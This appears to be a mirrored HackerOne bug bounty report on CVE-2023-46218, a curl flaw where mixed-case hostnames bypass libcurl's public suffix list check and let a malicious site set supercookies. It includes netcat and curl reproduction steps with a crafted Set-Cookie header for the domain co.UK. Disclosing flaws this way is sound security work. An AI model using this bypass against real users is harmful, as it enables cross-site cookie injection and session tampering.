Lucene search

K
hackeroneNyymiH1:2212193
HistoryOct 16, 2023 - 6:28 p.m.

curl: CVE-2023-46218: cookie mixed case PSL bypass

2023-10-1618:28:56
nyymi
hackerone.com
61
libcurl
vulnerability
cookie bypass
psl check
domain normalization
cookie_domain
mixed case
host header
supercookie
impact
bugbounty

AI Score

6.3

Confidence

High

EPSS

0.001

Percentile

30.9%

Summary:

libcurl fails to normalize the hostname and cookie_domain parameters passed to psl_is_cookie_domain_acceptable function. As a result a malicious site can set a super cookie if the victim requests the url with hostname with any upper case characters in the domain part of the hostname.

libpsl psl_is_cookie_domain_acceptable documentation https://rockdaboot.github.io/libpsl/libpsl-Public-Suffix-List-functions.html#psl-is-cookie-domain-acceptable says the following:

Use helper function psl_str_to_utf8lower() for normalization of hostname and cookie_domain .

This is not done correctly and hence domains with uppercase characters will bypass the PSL check. Note that curl itself will later ignore the cookie domain capitalization and will match even lowercase hostname with the stored supercookie’s mixed case domain.

It’s also worth noting that the request Host header will reveal the mixed case used, which will allow the attacker to prepare the correct Set-Cookie domain for the attack.

Steps To Reproduce:

  1. echo -ne "HTTP/1.1 200 OK\r\nSet-Cookie: super=oops; domain=co.UK\r\nContent-Length: 0\r\n" | nc -v -l -q 1 -p 8888
  2. curl -v -c c.txt --resolve test.co.uk:8888:testserverip http://test.co.UK:8888
  3. nc -v -l -p 7777
  4. curl -v -b c.txt --resolve other.co.uk:7777:testserverip http://other.co.uk:7777

Note that the super cookie is sent to the other.com.uk site. In fact it will be sent to any .co.uk hosts now.

The generated cookie file:

# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

.co.UK	TRUE	/	FALSE	0	super	oops

Impact

Bypassing supercookie protection.